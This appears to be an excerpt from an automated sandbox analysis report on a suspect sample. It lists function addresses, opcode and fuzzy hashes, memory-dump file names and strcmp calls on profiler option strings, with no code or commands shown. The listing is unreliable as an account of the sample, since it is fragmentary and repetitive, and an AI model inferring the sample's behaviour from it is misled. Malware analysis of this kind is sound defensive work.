Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Bg!o
API String ID: 0-206830373
Opcode ID: a470fbe25bb24476941d4794b2f917b3daacee38dd2698bb4cf88714d5f8f654
Instruction ID: 37fc31dfd70cfe38eb90207d057d1547d96418a2e881c6544a61a4ff826567df
Opcode Fuzzy Hash: a470fbe25bb24476941d4794b2f917b3daacee38dd2698bb4cf88714d5f8f654
Instruction Fuzzy Hash: 9A517FF3A082045FE304A93EED5463FB7DADBD5210F2AC63DE985C7748E875580A8156

Function 6C5B0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 40bcf79041c12945e1f0310d736268410cd2e6173586c68c1554802f10ab97d0
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 5F220671E046198FDB14CF98C990AADFBB2FF88304F54869AD44AB7745D731A986CF80

Function 6C5FAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bed52b55b061e3dae888e3853a40cdf6457fdc1a311b64c1d14902f15dbb617
Instruction ID: ad3cd2891787ff37f601d98cc3a94e3dcc983e60952a72ab2471901777c7b506
Opcode Fuzzy Hash: 8bed52b55b061e3dae888e3853a40cdf6457fdc1a311b64c1d14902f15dbb617
Instruction Fuzzy Hash: 7CF129716087458FD708CE28CC907AAB7E6AFC5318F158A2DE5F48B781E77498468F93

Function 00688B11 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a20040c026fcdd3bf90f8d35bd011348a73fdd8ed2ca29c51c07f16bc17a0dd
Instruction ID: 526e518328449e93e212126d51346834d0b689d9ff8d03ba5f10a59107edf953
Opcode Fuzzy Hash: 5a20040c026fcdd3bf90f8d35bd011348a73fdd8ed2ca29c51c07f16bc17a0dd
Instruction Fuzzy Hash: 5E51EAF3E082009FF3006A69DC8476AB7E6EBD8320F1B453DDBC887744E57958058656

Function 00697681 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea8bf83cbdbba4de9085cbedd52723c6bdb3f16c50a1179bd439cafe559f076
Instruction ID: 06ea8556fb22c63971da2d883c5805d088f62c3e16c40079ebe7879456537920
Opcode Fuzzy Hash: 1ea8bf83cbdbba4de9085cbedd52723c6bdb3f16c50a1179bd439cafe559f076
Instruction Fuzzy Hash: 874136B39483185FE3047A38EC4577AFBD9DB54720F16463EE9C4C3B40E5B669058292

Function 00715B37 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682db5c953771cdbf38d9b403ab81407597eb3b7199ad539e70508d3f212cb08
Instruction ID: b0d77f960cd66174b12eae8740f1adb2738a993fe44a7729721c31a1e5c13667
Opcode Fuzzy Hash: 682db5c953771cdbf38d9b403ab81407597eb3b7199ad539e70508d3f212cb08
Instruction Fuzzy Hash: F34187F3F181149BF308692DDC0676AB296DBD0720F2A853D9A98D77C8ED39E8054289

Function 006D5B81 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b8c78c626a592fcfe9977e9b92e38c281749e02fcf3952dec4db83a5010cf2
Instruction ID: 79f33e9b68e56467d9115d0c288d2e4c798ccaa75396800277b31ab22a149901
Opcode Fuzzy Hash: a9b8c78c626a592fcfe9977e9b92e38c281749e02fcf3952dec4db83a5010cf2
Instruction Fuzzy Hash: 2F41F5F3E081109BE708AE2DDC4976AB7E5AF94310F1B493CEBD9D7780E93958418786

Function 006D0AF0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12635ec371f71edf140bd1bec2c83a4c2b1c6734094b610dcddb85e992f4b98e
Instruction ID: 30dd2347f052d3fbb9e4aee00fe63992112248c17ac06689f5fd31339686b441
Opcode Fuzzy Hash: 12635ec371f71edf140bd1bec2c83a4c2b1c6734094b610dcddb85e992f4b98e
Instruction Fuzzy Hash: 1331D3F36086008BE304AE2ADD9477EBBE7EFD8720F2B453ED5C597780D57958058682

Function 00717673 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859f62fe4d34ef4b0abaeb35dbed68b1aada12566fc10a9b3f8887267ab6d790
Instruction ID: f4234c57dc74409cb5bd347b4ed822ba11b5e1c743ede6732d98d17a96a48e1b
Opcode Fuzzy Hash: 859f62fe4d34ef4b0abaeb35dbed68b1aada12566fc10a9b3f8887267ab6d790
Instruction Fuzzy Hash: AD310AF3A186105FE354AE39DC4533ABBE6EBC4320F17C73DD8D587698EA3818058692

Function 003D9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C5CCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C59582D), ref: 6C5CCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C59582D), ref: 6C5CCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C5FFE98,?,?,?,?,?,6C59582D), ref: 6C5CCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C59582D), ref: 6C5CCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C59582D), ref: 6C5CCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C59582D), ref: 6C5CCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C59582D), ref: 6C5CCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C5CCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C5CCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C5CCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C5CCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C5CCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C5CCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C5CCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C5CCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C5CCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C5CCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C5CCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C5CCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C5CCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C5CCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C5CCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C5CCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C5CCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C5CCE8A

Strings

fileioall, xrefs: 6C5CCCA8
markersallthreads, xrefs: 6C5CCE42
